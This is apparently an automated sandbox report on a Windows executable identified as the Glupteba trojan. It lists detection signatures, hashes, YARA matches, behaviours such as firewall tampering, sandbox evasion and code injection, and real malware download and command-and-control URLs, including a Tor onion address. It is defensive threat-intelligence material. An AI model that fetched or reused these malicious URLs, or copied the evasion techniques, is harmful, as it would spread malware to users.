Windows Analysis Report
kdsyitkxmS.exe

Overview

General Information

Sample Name: kdsyitkxmS.exe
Analysis ID: 877005
MD5: 01fe6ba28d82175d35665b3eb6ed8cea
SHA1: 45748a6d6474f470d44e848596e0e08bce674996
SHA256: 626df082c2624d9530794881921094aa100fa0a805b1544112d5a07dbe12cbc2
Infos:

Detection

Glupteba
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Sigma detected: Schedule system process
Yara detected Glupteba
Detected unpacking (changes PE section rights)
Antivirus detection for URL or domain
Antivirus detection for dropped file
Multi AV Scanner detection for dropped file
Snort IDS alert for network traffic
Creates an autostart registry key pointing to binary in C:\Windows
Uses netsh to modify the Windows network and firewall settings
Found Tor onion address
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Uses shutdown.exe to shutdown or reboot the system
Machine Learning detection for sample
Creates files in the system32 config directory
Modifies the windows firewall
Performs DNS TXT record lookups
Drops executables to the windows directory (C:\Windows) and starts them
Uses schtasks.exe or at.exe to add and modify task schedules
Uses STUN server to do NAT traversial
Drops PE files with benign system names
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Deletes files inside the Windows folder
May sleep (evasive loops) to hinder dynamic analysis
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Uses code obfuscation techniques (call, push, ret)
Creates files inside the system directory
PE file contains sections with non-standard names
Sample execution stops while process was sleeping (likely an evasion)
Found dropped PE file which has not been started or loaded
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Drops files with a non-matching file extension (content does not match file extension)
AV process strings found (often used to terminate AV products)
PE file does not import any functions
Sample file is different than original file name gathered from version info
PE file contains an invalid checksum
Drops PE files
Tries to load missing DLLs
Uses a known web browser user agent for HTTP communication
Drops PE files to the windows directory (C:\Windows)
Detected TCP or UDP traffic on non-standard ports
Contains capabilities to detect virtual machines
Enables security privileges
PE / OLE file has an invalid certificate
PE file contains more sections than normal
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Creates a process in suspended mode (likely to inject code)

Classification

Name Description Attribution Blogpost URLs Link
Glupteba Glupteba is a trojan horse malware that is one of the top ten malware variants of 2021. After infecting a system, the Glupteba malware can be used to deliver additional malware, steal user authentication information, and enroll the infected system in a cryptomining botnet. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.glupteba

AV Detection
barindex
Multi AV Scanner detection for submitted file
Source: kdsyitkxmS.exe Virustotal: Detection: 31% Perma Link
Source: kdsyitkxmS.exe ReversingLabs: Detection: 32%
Yara detected Glupteba
Source: Yara match File source: 10.3.kdsyitkxmS.exe.3ab0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 58.3.csrss.exe.3d00000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000002B.00000003.208864091925.0000000004141000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000017.00000003.208782822555.0000000004141000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001F.00000003.208814614113.0000000004141000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000003D.00000003.209030995606.0000000004141000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000003.208339389704.0000000003EF1000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000003A.00000003.208966850463.0000000004141000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000032.00000003.208899557160.0000000004141000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000037.00000003.208942288673.0000000004141000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.208202854778.0000000003ED1000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000028.00000003.208837272188.0000000004141000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000003.208687751303.0000000004141000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: kdsyitkxmS.exe PID: 4688, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: kdsyitkxmS.exe PID: 8716, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: csrss.exe PID: 2532, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: csrss.exe PID: 768, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: csrss.exe PID: 7048, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: csrss.exe PID: 8952, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: csrss.exe PID: 9120, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: csrss.exe PID: 7120, type: MEMORYSTR
Antivirus detection for URL or domain
Source: http://server5.vcr4vuv4sf5233btfy7xboezl7umjw7rljdmaeztmmf4s6k2ivinj3yd.onion/api/pollxennHbdeCkATuZ Avira URL Cloud: Label: malware
Source: http://server5.vcr4vuv4sf5233btfy7xboezl7umjw7rljdmaeztmmf4s6k2ivinj3yd.onion/api/cdn?c=03d8840b313d Avira URL Cloud: Label: malware
Source: https://server5.duniadekho.bar/api/signature/21f67ca2e1b8b0405399c65a0e0d031e Avira URL Cloud: Label: malware
Source: https://duniadekho.bar Avira URL Cloud: Label: malware
Source: https://server5.duniadekho.bar/api/restriction-usH2 Avira URL Cloud: Label: malware
Source: https://twopixis.com/w/w-8-debug.exe Avira URL Cloud: Label: malware
Source: http://server5.vcr4vuv4sf5233btfy7xboezl7umjw7rljdmaeztmmf4s6k2ivinj3yd.onion/api/poll Avira URL Cloud: Label: malware
Source: https://twopixis.com/watchdog Avira URL Cloud: Label: malware
Source: https://twopixis.com/watchdog/watchdog.exe Avira URL Cloud: Label: malware
Source: http://server5.vcr4vuv4sf5233btfy7xboezl7umjw7rljdmaeztmmf4s6k2ivinj3yd.onion/api/pollnnHbdeCkATuZNP Avira URL Cloud: Label: malware
Source: https://server5.duniadekho.bar/api/poll Avira URL Cloud: Label: malware
Source: https://twopixis.com/wupxarch-6162-dcb505dc2b9d8aac05f4ca0727f5eadb.exe Avira URL Cloud: Label: malware
Source: https://server5.duniadekho.bar/api/restriction-us Avira URL Cloud: Label: malware
Source: https://twopixis.com/smbscanlocal-1bf850b4d9587c1017a75a47680584c4.exe Avira URL Cloud: Label: malware
Source: https://twopixis.com/gm-305-7507ffc9a340f774985cb5ca11ca78c4.exe Avira URL Cloud: Label: malware
Source: http://vcr4vuv4sf5233btfy7xboezl7umjw7rljdmaeztmmf4s6k2ivinj3yd.onion Avira URL Cloud: Label: malware
Source: https://twopixis.com/watchdog/watchdog.exeSETCONF Avira URL Cloud: Label: malware
Source: https://server5.duniadekho.bar Avira URL Cloud: Label: malware
Source: https://server5.duniadekho.bar/api/cdn?c=50d7801a966ceaa4&uuid=ec87b504-92ea-4d22-a937-161700799581 Avira URL Cloud: Label: malware
Source: https://server5.duniadekho.bar/api/signature/ Avira URL Cloud: Label: malware
Source: http://server5.vcr4vuv4sf5233btfy7xboezl7umjw7rljdmaeztmmf4s6k2ivinj3yd.onion Avira URL Cloud: Label: malware
Source: https://twopixis.com/watchdog/watchdog.exeno-store Avira URL Cloud: Label: malware
Antivirus detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exe Avira: detection malicious, Label: TR/Agent.twerk
Source: C:\Users\user\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll Avira: detection malicious, Label: TR/Redcap.gsjan
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll ReversingLabs: Detection: 88%
Source: C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exe ReversingLabs: Detection: 92%
Source: C:\Windows\rss\csrss.exe ReversingLabs: Detection: 32%
Machine Learning detection for sample
Source: kdsyitkxmS.exe Joe Sandbox ML: detected

Bitcoin Miner
barindex
Yara detected Glupteba
Source: Yara match File source: 10.3.kdsyitkxmS.exe.3ab0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 58.3.csrss.exe.3d00000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000002B.00000003.208864091925.0000000004141000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000017.00000003.208782822555.0000000004141000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001F.00000003.208814614113.0000000004141000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000003D.00000003.209030995606.0000000004141000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000003.208339389704.0000000003EF1000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000003A.00000003.208966850463.0000000004141000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000032.00000003.208899557160.0000000004141000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000037.00000003.208942288673.0000000004141000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.208202854778.0000000003ED1000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000028.00000003.208837272188.0000000004141000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000003.208687751303.0000000004141000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: kdsyitkxmS.exe PID: 4688, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: kdsyitkxmS.exe PID: 8716, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: csrss.exe PID: 2532, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: csrss.exe PID: 768, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: csrss.exe PID: 7048, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: csrss.exe PID: 8952, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: csrss.exe PID: 9120, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: csrss.exe PID: 7120, type: MEMORYSTR
Uses 32bit PE files
Source: kdsyitkxmS.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: C:\Windows\rss\csrss.exe Registry value created: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Uninstaller Jump to behavior
Source: Binary string: System.Data.pdb source: powershell.exe, 00000035.00000002.209088197993.000000006BC32000.00000020.00000001.01000000.00000012.sdmp
Source: Binary string: Age does not matchThe module age and .pdb age do not match. source: kdsyitkxmS.exe, 00000004.00000003.208202854778.000000000415B000.00000004.00001000.00020000.00000000.sdmp, kdsyitkxmS.exe, 0000000A.00000003.208339389704.000000000417B000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000017.00000003.208782822555.00000000043CB000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000001F.00000003.208814614113.00000000043CB000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000002B.00000003.208864091925.00000000043CB000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: symsrv.pdb source: kdsyitkxmS.exe, 00000004.00000003.208202854778.0000000004308000.00000004.00001000.00020000.00000000.sdmp, kdsyitkxmS.exe, 0000000A.00000003.208339389704.0000000004328000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000017.00000003.208782822555.0000000004578000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000001F.00000003.208814614113.0000000004578000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000002B.00000003.208864091925.0000000004578000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: Microsoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 00000035.00000002.209062092812.000000006B23F000.00000020.00000001.01000000.00000018.sdmp
Source: Binary string: PDB not foundUnable to locate the .pdb file in any of the symbol search path locations. source: kdsyitkxmS.exe, 00000004.00000003.208202854778.000000000415B000.00000004.00001000.00020000.00000000.sdmp, kdsyitkxmS.exe, 0000000A.00000003.208339389704.000000000417B000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000017.00000003.208782822555.00000000043CB000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000001F.00000003.208814614113.00000000043CB000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000002B.00000003.208864091925.00000000043CB000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: System.Core.ni.pdb source: powershell.exe, 00000035.00000002.209224649761.0000000071891000.00000020.00000001.01000000.0000000A.sdmp
Source: Binary string: c:\Users\Admin\documents\visual studio 2015\Projects\Winmon\Release\Winmon.pdb source: kdsyitkxmS.exe, 00000004.00000003.208202854778.0000000003ED1000.00000004.00001000.00020000.00000000.sdmp, kdsyitkxmS.exe, 0000000A.00000003.208339389704.0000000003EF1000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000014.00000003.208687751303.0000000004141000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000017.00000003.208782822555.0000000004141000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000001F.00000003.208814614113.0000000004141000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000028.00000003.208837272188.0000000004141000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000002B.00000003.208864091925.0000000004141000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000032.00000003.208899557160.0000000004141000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: System.Numerics.ni.pdb source: powershell.exe, 00000035.00000002.209181323602.00000000704F7000.00000020.00000001.01000000.00000011.sdmp
Source: Binary string: System.Transactions.ni.pdbRSDSc source: powershell.exe, 00000035.00000002.209083403499.000000006B516000.00000020.00000001.01000000.00000015.sdmp
Source: Binary string: Error while loading symbolsUnable to locate the .pdb file in any of the symbol search source: kdsyitkxmS.exe, 00000004.00000003.208202854778.000000000415B000.00000004.00001000.00020000.00000000.sdmp, kdsyitkxmS.exe, 0000000A.00000003.208339389704.000000000417B000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000017.00000003.208782822555.00000000043CB000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000001F.00000003.208814614113.00000000043CB000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000002B.00000003.208864091925.00000000043CB000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: System.Management.ni.pdbRSDSJ< source: powershell.exe, 00000035.00000002.209104723961.000000006C4B0000.00000020.00000001.01000000.0000000E.sdmp
Source: Binary string: C:\Users\Admin\documents\visual studio 2015\Projects\WinmonFS\x64\Release\WinmonFS.pdb source: kdsyitkxmS.exe, 00000004.00000003.208202854778.0000000003ED1000.00000004.00001000.00020000.00000000.sdmp, kdsyitkxmS.exe, 0000000A.00000003.208339389704.0000000003EF1000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000014.00000003.208687751303.0000000004141000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000017.00000003.208782822555.0000000004141000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000001F.00000003.208814614113.0000000004141000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000028.00000003.208837272188.0000000004141000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000002B.00000003.208864091925.0000000004141000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000032.00000003.208899557160.0000000004141000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: symsrv.pdbGCTL source: kdsyitkxmS.exe, 00000004.00000003.208202854778.0000000004308000.00000004.00001000.00020000.00000000.sdmp, kdsyitkxmS.exe, 0000000A.00000003.208339389704.0000000004328000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000017.00000003.208782822555.0000000004578000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000001F.00000003.208814614113.0000000004578000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000002B.00000003.208864091925.0000000004578000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: C:\Users\Admin\documents\visual studio 2015\Projects\WinmonFS\Release\WinmonFS.pdb source: kdsyitkxmS.exe, 00000004.00000003.208202854778.0000000003ED1000.00000004.00001000.00020000.00000000.sdmp, kdsyitkxmS.exe, 0000000A.00000003.208339389704.0000000003EF1000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000014.00000003.208687751303.0000000004141000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000017.00000003.208782822555.0000000004141000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000001F.00000003.208814614113.0000000004141000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000028.00000003.208837272188.0000000004141000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000002B.00000003.208864091925.0000000004141000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000032.00000003.208899557160.0000000004141000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: C:\Users\admin\source\repos\driver-process-monitor-master\x64\Release\WinmonProcessMonitor.pdb source: kdsyitkxmS.exe, 00000004.00000003.208202854778.0000000003ED1000.00000004.00001000.00020000.00000000.sdmp, kdsyitkxmS.exe, 0000000A.00000003.208339389704.0000000003EF1000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000014.00000003.208687751303.0000000004141000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000017.00000003.208782822555.0000000004141000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000001F.00000003.208814614113.0000000004141000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000028.00000003.208837272188.0000000004141000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000002B.00000003.208864091925.0000000004141000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000032.00000003.208899557160.0000000004141000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: EfiGuardDxe.pdb source: kdsyitkxmS.exe, 00000004.00000003.208202854778.000000000415B000.00000004.00001000.00020000.00000000.sdmp, kdsyitkxmS.exe, 0000000A.00000003.208339389704.000000000417B000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000014.00000003.208687751303.00000000043CB000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000017.00000003.208782822555.00000000043CB000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000001F.00000003.208814614113.00000000043CB000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000028.00000003.208837272188.00000000043CB000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000002B.00000003.208864091925.00000000043CB000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000032.00000003.208899557160.00000000043CB000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: Microsoft.PowerShell.Commands.Utility.ni.pdbRSDS source: powershell.exe, 00000035.00000002.209062092812.000000006B23F000.00000020.00000001.01000000.00000018.sdmp
Source: Binary string: Signature does not matchThe module signature does not match with .pdb signature source: kdsyitkxmS.exe, 00000004.00000003.208202854778.000000000415B000.00000004.00001000.00020000.00000000.sdmp, kdsyitkxmS.exe, 0000000A.00000003.208339389704.000000000417B000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000017.00000003.208782822555.00000000043CB000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000001F.00000003.208814614113.00000000043CB000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000002B.00000003.208864091925.00000000043CB000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: dbghelp.pdb source: kdsyitkxmS.exe, 00000004.00000003.208202854778.000000000415B000.00000004.00001000.00020000.00000000.sdmp, kdsyitkxmS.exe, 0000000A.00000003.208339389704.000000000417B000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000017.00000003.208782822555.00000000043CB000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000001F.00000003.208814614113.00000000043CB000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000002B.00000003.208864091925.00000000043CB000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: dbghelp.pdbGCTL source: kdsyitkxmS.exe, 00000004.00000003.208202854778.000000000415B000.00000004.00001000.00020000.00000000.sdmp, kdsyitkxmS.exe, 0000000A.00000003.208339389704.000000000417B000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000017.00000003.208782822555.00000000043CB000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000001F.00000003.208814614113.00000000043CB000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000002B.00000003.208864091925.00000000043CB000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: Loader.pdb source: kdsyitkxmS.exe, 00000004.00000003.208202854778.0000000003ED1000.00000004.00001000.00020000.00000000.sdmp, kdsyitkxmS.exe, 0000000A.00000003.208339389704.0000000003EF1000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000014.00000003.208687751303.0000000004141000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000017.00000003.208782822555.0000000004141000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000001F.00000003.208814614113.0000000004141000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000028.00000003.208837272188.0000000004141000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000002B.00000003.208864091925.0000000004141000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000032.00000003.208899557160.0000000004141000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: Microsoft.PowerShell.Security.ni.pdb source: powershell.exe, 00000035.00000002.209085027998.000000006B5CD000.00000020.00000001.01000000.00000014.sdmp
Source: Binary string: Unrecognized pdb formatThis error indicates attempting to access a .pdb file with source: kdsyitkxmS.exe, 00000004.00000003.208202854778.000000000415B000.00000004.00001000.00020000.00000000.sdmp, kdsyitkxmS.exe, 0000000A.00000003.208339389704.000000000417B000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000017.00000003.208782822555.00000000043CB000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000001F.00000003.208814614113.00000000043CB000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000002B.00000003.208864091925.00000000043CB000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: A connection with the server could not be establishedAn extended error was returned from the WinHttp serverThe .pdb file is probably no longer indexed in the symbol server share location. source: kdsyitkxmS.exe, 00000004.00000003.208202854778.000000000415B000.00000004.00001000.00020000.00000000.sdmp, kdsyitkxmS.exe, 0000000A.00000003.208339389704.000000000417B000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000017.00000003.208782822555.00000000043CB000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000001F.00000003.208814614113.00000000043CB000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000002B.00000003.208864091925.00000000043CB000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: Cvinfo is corruptThe .pdb file contains a corrupted debug codeview information. source: kdsyitkxmS.exe, 00000004.00000003.208202854778.000000000415B000.00000004.00001000.00020000.00000000.sdmp, kdsyitkxmS.exe, 0000000A.00000003.208339389704.000000000417B000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000017.00000003.208782822555.00000000043CB000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000001F.00000003.208814614113.00000000043CB000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000002B.00000003.208864091925.00000000043CB000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: System.Data.ni.pdb source: powershell.exe, 00000035.00000002.209088197993.000000006BC32000.00000020.00000001.01000000.00000012.sdmp
Source: Binary string: Downloading symbols for [%s] %ssrv*symsrv*http://https://_bad_pdb_file.pdb source: kdsyitkxmS.exe, 00000004.00000003.208202854778.000000000415B000.00000004.00001000.00020000.00000000.sdmp, kdsyitkxmS.exe, 0000000A.00000003.208339389704.000000000417B000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000017.00000003.208782822555.00000000043CB000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000001F.00000003.208814614113.00000000043CB000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000002B.00000003.208864091925.00000000043CB000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: The symbol server has never indexed any version of this symbol fileNo version of the .pdb file with the given name has ever been registered. source: kdsyitkxmS.exe, 00000004.00000003.208202854778.000000000415B000.00000004.00001000.00020000.00000000.sdmp, kdsyitkxmS.exe, 0000000A.00000003.208339389704.000000000417B000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000017.00000003.208782822555.00000000043CB000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000001F.00000003.208814614113.00000000043CB000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000002B.00000003.208864091925.00000000043CB000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: System.Numerics.ni.pdbRSDSautg source: powershell.exe, 00000035.00000002.209181323602.00000000704F7000.00000020.00000001.01000000.00000011.sdmp
Source: Binary string: C:\vbox\branch\w64-1.6\out\win.amd64\release\obj\src\VBox\HostDrivers\VBoxDrv\VBoxDrv.pdb source: kdsyitkxmS.exe, 00000004.00000003.208202854778.0000000003ED1000.00000004.00001000.00020000.00000000.sdmp, kdsyitkxmS.exe, 0000000A.00000003.208339389704.0000000003EF1000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000014.00000003.208687751303.0000000004141000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000017.00000003.208782822555.0000000004141000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000001F.00000003.208814614113.0000000004141000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000028.00000003.208837272188.0000000004141000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000002B.00000003.208864091925.0000000004141000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000032.00000003.208899557160.0000000004141000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: Drive not readyThis error indicates a .pdb file related failure. source: kdsyitkxmS.exe, 00000004.00000003.208202854778.000000000415B000.00000004.00001000.00020000.00000000.sdmp, kdsyitkxmS.exe, 0000000A.00000003.208339389704.000000000417B000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000017.00000003.208782822555.00000000043CB000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000001F.00000003.208814614113.00000000043CB000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000002B.00000003.208864091925.00000000043CB000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: c:\Users\Admin\documents\visual studio 2015\Projects\Winmon\x64\Release\Winmon.pdb source: kdsyitkxmS.exe, 00000004.00000003.208202854778.0000000003ED1000.00000004.00001000.00020000.00000000.sdmp, kdsyitkxmS.exe, 0000000A.00000003.208339389704.0000000003EF1000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000014.00000003.208687751303.0000000004141000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000017.00000003.208782822555.0000000004141000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000001F.00000003.208814614113.0000000004141000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000028.00000003.208837272188.0000000004141000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000002B.00000003.208864091925.0000000004141000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000032.00000003.208899557160.0000000004141000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: zzz_AsmCodeRange_*FrameDatainvalid string positionstring too long.pdb source: kdsyitkxmS.exe, 00000004.00000003.208202854778.000000000415B000.00000004.00001000.00020000.00000000.sdmp, kdsyitkxmS.exe, 0000000A.00000003.208339389704.000000000417B000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000017.00000003.208782822555.00000000043CB000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000001F.00000003.208814614113.00000000043CB000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000002B.00000003.208864091925.00000000043CB000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: Pdb read access deniedYou may be attempting to access a .pdb file with read-only attributes source: kdsyitkxmS.exe, 00000004.00000003.208202854778.000000000415B000.00000004.00001000.00020000.00000000.sdmp, kdsyitkxmS.exe, 0000000A.00000003.208339389704.000000000417B000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000017.00000003.208782822555.00000000043CB000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000001F.00000003.208814614113.00000000043CB000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000002B.00000003.208864091925.00000000043CB000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: Unable to locate the .pdb file in this location source: kdsyitkxmS.exe, 00000004.00000003.208202854778.000000000415B000.00000004.00001000.00020000.00000000.sdmp, kdsyitkxmS.exe, 0000000A.00000003.208339389704.000000000417B000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000017.00000003.208782822555.00000000043CB000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000001F.00000003.208814614113.00000000043CB000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000002B.00000003.208864091925.00000000043CB000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: Microsoft.PowerShell.Commands.Utility.ni.pdb source: powershell.exe, 00000035.00000002.209062092812.000000006B23F000.00000020.00000001.01000000.00000018.sdmp
